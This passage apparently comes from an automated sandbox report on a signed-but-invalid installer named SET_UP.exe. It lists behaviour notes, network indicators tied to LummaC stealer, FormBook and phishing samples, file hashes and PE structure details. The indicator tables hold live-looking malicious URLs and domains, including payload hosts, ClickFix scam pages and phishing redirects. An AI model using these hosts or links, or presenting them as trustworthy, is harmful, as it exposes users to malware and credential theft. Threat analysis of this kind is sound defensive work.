                                                                                                                                          Behavior and APIs

                                                                                                                                          TimeTypeDescription
                                                                                                                                          08:48:23API Interceptor10x Sleep call for process: SET_UP.exe modified
                                                                                                                                          08:48:36API Interceptor10x Sleep call for process: powershell.exe modified

                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                          IPs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          188.114.97.3DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.uzshou.world/ricr/
                                                                                                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.cifasnc.info/8rr3/
                                                                                                                                          Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
                                                                                                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.cifasnc.info/8rr3/
                                                                                                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • /api/get/free
                                                                                                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • /api/get/free
                                                                                                                                          RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.rgenerousrs.store/o362/
                                                                                                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • www.beylikduzu616161.xyz/2nga/
                                                                                                                                          Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                                          • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                                                          ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                          • paste.ee/d/lxvbq
                                                                                                                                          185.161.251.21Set-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            cegu.shopSet-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21

                                                                                                                                                            ASNs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            CLOUDFLARENETUSSet-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 104.21.25.52
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 104.21.80.1
                                                                                                                                                            https://sos-ch-gva-2.exo.io/ready/seah/continue/complete-this-to-continue.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                            • 104.17.25.14
                                                                                                                                                            te13.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                            • 104.21.16.1
                                                                                                                                                            New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.17.25.14
                                                                                                                                                            https://email.garagesalefinder.com/c/eJyMU92OsjoUfZp6xwRaoO2FF-XPYT4VnXHQ8caUFivK3wcC-vYnzImc25OQlbXYa-_VJrtyniCCZ-ncwMg2KKWmPrvMCRWYGDSBBAkLnSGigttEUJpiLHRhzLK5JRHWEbE0wS1LkxzqmpnKRCMYcymIhUyJgKkr3nCVtjxPz1kp0-ZNVMUsn1_u9xogBmAAYDAMw5uqKpWnXLZp02cibUcfgEHNVcolgAEX-Q2goOUAeUsAbZ4B5Lma-bXS9YjEH8_jUsCMDFHdh-8V6xawX6ug4FFt3FtnCCFin8wJow2-DWulyU1_iVhfsfe8SpYtI8px_iiPHZXv8Movh2Cj-95Hcj0kV7urV6jyYvatjOfWaYZ2MRxIba6V3Jx55O3PcZmp2muai3lerzYyDgu0zWKnNlb-o7Sf7h6p70NxCvM23_41HfOEGuWGy9q9Hnlqfep7pO0Kfgrvm-rvV7zTOloie11_fJdEol2uDrr9xfmOPrr1Vr-IJWM_mXjnt9SPV5IVx53pOD-UrUI1qHwX-N2-JfHP9ThUm97B9z_nIOnjcuOGjloo51Iwxy6FckMA7bIrAPIMAG2RSYA8a5H18gTbKy737aLto4f-0GD3DaDdZgogj0WebZ6M8IN8ys_TY2eziPTBe70KjWKtt8gaxll5lpZ3gDzBtbpLNBsalBgGNrFuUoTHOC67JgfIGzehnVYBQAtjAC37l8GRuSOYU4G-pG2NgEYgk_ReFjwWsPli0J_MwSSdVxuc_v2bYU25I0BvMvvT0fBL_tdrsyktMAglv0Qs4o5D0vHD8ZIUFG4XwVMUFP0UQcef1jWBOkDea447drMR_PHuZATmTlIH0KIMQPP3-3_uWTOv0_JWvWU9L6semDpvmmpIeHn7fYv9HP4TAAD__7e2IkMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 104.17.25.14
                                                                                                                                                            https://check.qlkwr.com/awjsx.captcha?u=d9b43caa-60bc-4673-bed6-4e9abc0c0678Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.21.55.46
                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                            • 188.114.96.3
                                                                                                                                                            Crawl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 1.1.1.1
                                                                                                                                                            NTLGBSet-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 86.15.78.37
                                                                                                                                                            installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 194.168.231.153
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 185.161.251.21

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1Set-UpFile_v25.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            64pOGv7k4N.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21

                                                                                                                                                            Dropped Files

                                                                                                                                                            No context

                                                                                                                                                            Created / dropped Files

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):64
                                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                                                                                                            MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                                                                                                            SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                                                                                                            SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                                                                                                            SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview:@...e.................................^..............@..........

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfc5xe5f.4jm.psm1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgb1yaxp.xwn.ps1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                            Static File Info

                                                                                                                                                            General

                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Entropy (8bit):0.5160441155087524
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 97.75%
                                                                                                                                                            • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                            • Inno Setup installer (109748/4) 1.07%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            File name:SET_UP.exe
                                                                                                                                                            File size:75'071'589 bytes
                                                                                                                                                            MD5:0f91b9310e783c23ada7d4c31c89be4b
                                                                                                                                                            SHA1:5fd4b60f7b500744b8fbd260df03172effde1be1
                                                                                                                                                            SHA256:f5413e2c9c6dead8cef37abe15a25e8aa16aca8582116079211e66400e960687
                                                                                                                                                            SHA512:1b3d59e3e3e2dae1a858e16c33d5be907f5e8d88671b6df348d388806b584065b16d675de06b142c5c411996239330e5f4e01a3fe7051dbe0b00f8c2c712eb10
                                                                                                                                                            SSDEEP:24576:+tdAm9DUi/CR3wCkCie9goG7hBaHkbEXXeG/jFt5xTx9Cp5m+8fLfK9wKk26c:OqTyte9Fk6ek1XZ+WK9wKk26
                                                                                                                                                            TLSH:EBF7C2295A0023A99F72DFED490697C89934F580A3101CFF55DA0FC9C6BB5DAC2326F9
                                                                                                                                                            File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:2d2e3797b32b2b99

                                                                                                                                                            Static PE Info

                                                                                                                                                            General

                                                                                                                                                            Entrypoint:0x50156c
                                                                                                                                                            Entrypoint Section:.itext
                                                                                                                                                            Digitally signed:true
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:5
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:5
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f62b90e31eca404f228fcf7068b00f31

                                                                                                                                                            Authenticode Signature

                                                                                                                                                            Signature Valid:false
                                                                                                                                                            Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                            Not Before, Not After
                                                                                                                                                            • 27/07/2015 20:00:00 26/07/2018 19:59:59
                                                                                                                                                            Subject Chain
                                                                                                                                                            • CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
                                                                                                                                                            Version:3
                                                                                                                                                            Thumbprint MD5:F7219078FBE20BC1B98BF8A86BFC0396
                                                                                                                                                            Thumbprint SHA-1:30632EA310114105969D0BDA28FDCE267104754F
                                                                                                                                                            Thumbprint SHA-256:1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
                                                                                                                                                            Serial:14781BC862E8DC503A559346F5DCC518

                                                                                                                                                            Entrypoint Preview

                                                                                                                                                            Instruction
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            add esp, FFFFFFF0h
                                                                                                                                                            push ebx
                                                                                                                                                            push esi
                                                                                                                                                            push edi
                                                                                                                                                            mov eax, 004FEBF4h
                                                                                                                                                            call 00007F3A14CCD292h
                                                                                                                                                            push FFFFFFECh
                                                                                                                                                            mov eax, dword ptr [00504E38h]
                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                            mov ebx, dword ptr [eax+00000170h]
                                                                                                                                                            push ebx
                                                                                                                                                            call 00007F3A14CCE13Dh
                                                                                                                                                            and eax, FFFFFF7Fh
                                                                                                                                                            push eax
                                                                                                                                                            push FFFFFFECh
                                                                                                                                                            mov eax, dword ptr [00504E38h]
                                                                                                                                                            push ebx
                                                                                                                                                            call 00007F3A14CCE392h
                                                                                                                                                            xor eax, eax
                                                                                                                                                            push ebp
                                                                                                                                                            push 005015E7h
                                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                                            push 00000001h
                                                                                                                                                            call 00007F3A14CCDADDh
                                                                                                                                                            call 00007F3A14DC2C3Ch
                                                                                                                                                            mov eax, dword ptr [004FE82Ch]
                                                                                                                                                            push eax
                                                                                                                                                            push 004FE890h
                                                                                                                                                            mov eax, dword ptr [00504E38h]
                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                            call 00007F3A14D406D1h
                                                                                                                                                            call 00007F3A14DC2C90h
                                                                                                                                                            xor eax, eax
                                                                                                                                                            pop edx
                                                                                                                                                            pop ecx
                                                                                                                                                            pop ecx
                                                                                                                                                            mov dword ptr fs:[eax], edx
                                                                                                                                                            jmp 00007F3A14DC58DBh
                                                                                                                                                            jmp 00007F3A14CC89B9h
                                                                                                                                                            call 00007F3A14DC2A0Ch
                                                                                                                                                            mov eax, 00000001h
                                                                                                                                                            call 00007F3A14CC947Ah
                                                                                                                                                            call 00007F3A14CC8DFDh
                                                                                                                                                            mov eax, dword ptr [00504E38h]
                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                            mov edx, 0050177Ch
                                                                                                                                                            call 00007F3A14D401DCh
                                                                                                                                                            push 00000005h
                                                                                                                                                            mov eax, dword ptr [00504E38h]
                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                            mov eax, dword ptr [eax+00000170h]
                                                                                                                                                            push eax
                                                                                                                                                            call 00007F3A14CCE353h
                                                                                                                                                            mov eax, dword ptr [00504E38h]
                                                                                                                                                            mov eax, dword ptr [eax]
                                                                                                                                                            mov edx, dword ptr [004D9740h]

                                                                                                                                                            Data Directories

                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x10d0000x3840.idata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1130000x70200.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x47946a50x39c0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x1120000x18.rdata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x10da800x88c.idata
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                            Sections

                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x10000xfe0840xfe20059cb92898a65f05e463173a65db38af6False0.48326153621495327data6.4857706218382365IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .itext0x1000000x17880x1800030d751d7e20e11f863bdb27a950c708False0.5203450520833334data5.94899155660316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .data0x1020000x30680x32002f90c6f68c18651f5b580d5ad2b852e9False0.421796875data4.334644118113417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .bss0x1060000x61940x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .idata0x10d0000x38400x3a00e31e730fc86b9dac8932bd3f92752751False0.31041217672413796data5.202469592139362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .tls0x1110000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                            .rdata0x1120000x180x200d6264f4705ad03600aa29f24c89eb799False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.20544562813451883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0x1130000x702000x70200824aab27f0c34b2054c629da716ccf5cFalse0.5725051386566332data7.361639614820677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                            Resources

                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_CURSOR0x113c440x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                            RT_CURSOR0x113d780x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                            RT_CURSOR0x113eac0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                            RT_CURSOR0x113fe00x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                            RT_CURSOR0x1141140x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                            RT_CURSOR0x1142480x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                            RT_CURSOR0x11437c0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                            RT_BITMAP0x1144b00x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                                                                            RT_BITMAP0x1149980xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                                                                            RT_ICON0x114a800x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5675675675675675
                                                                                                                                                            RT_ICON0x114ba80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.4486994219653179
                                                                                                                                                            RT_ICON0x1151100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.4637096774193548
                                                                                                                                                            RT_ICON0x1153f80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.3935018050541516
                                                                                                                                                            RT_STRING0x115ca00xecdata0.6059322033898306
                                                                                                                                                            RT_STRING0x115d8c0x250data0.47466216216216217
                                                                                                                                                            RT_STRING0x115fdc0x28cdata0.4647239263803681
                                                                                                                                                            RT_STRING0x1162680x3e4data0.4347389558232932
                                                                                                                                                            RT_STRING0x11664c0x9cdata0.717948717948718
                                                                                                                                                            RT_STRING0x1166e80xe8data0.6293103448275862
                                                                                                                                                            RT_STRING0x1167d00x468data0.3820921985815603
                                                                                                                                                            RT_STRING0x116c380x38cdata0.3898678414096916
                                                                                                                                                            RT_STRING0x116fc40x3dcdata0.39271255060728744
                                                                                                                                                            RT_STRING0x1173a00x360data0.37037037037037035
                                                                                                                                                            RT_STRING0x1177000x40cdata0.3783783783783784
                                                                                                                                                            RT_STRING0x117b0c0x108data0.5113636363636364
                                                                                                                                                            RT_STRING0x117c140xccdata0.6029411764705882
                                                                                                                                                            RT_STRING0x117ce00x234data0.5070921985815603
                                                                                                                                                            RT_STRING0x117f140x3c8data0.3181818181818182
                                                                                                                                                            RT_STRING0x1182dc0x32cdata0.43349753694581283
                                                                                                                                                            RT_STRING0x1186080x2a0data0.41964285714285715
                                                                                                                                                            RT_RCDATA0x1188a80x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                                            RT_RCDATA0x120b900x10data1.5
                                                                                                                                                            RT_RCDATA0x120ba00x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                            RT_RCDATA0x1223a00x6b0data0.6466121495327103
                                                                                                                                                            RT_RCDATA0x122a500x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                                                                            RT_RCDATA0x1285600x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                                                                            RT_RCDATA0x1286880x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                                                                            RT_RCDATA0x128a2c0x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                                                                            RT_RCDATA0x128d4c0x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                                                                            RT_RCDATA0x12904c0x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                                                                            RT_RCDATA0x1296280x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                                            RT_RCDATA0x129a8c0x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                                            RT_GROUP_CURSOR0x12bb200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                            RT_GROUP_CURSOR0x12bb340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                            RT_GROUP_CURSOR0x12bb480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                            RT_GROUP_CURSOR0x12bb5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                            RT_GROUP_CURSOR0x12bb700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                            RT_GROUP_CURSOR0x12bb840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                            RT_GROUP_CURSOR0x12bb980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                            RT_GROUP_ICON0x12bbac0x3edataEnglishUnited States0.8387096774193549
                                                                                                                                                            RT_VERSION0x12bbec0x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                                            RT_MANIFEST0x12bd480x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                                            Imports

                                                                                                                                                            DLLImport
                                                                                                                                                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                            advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                            user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
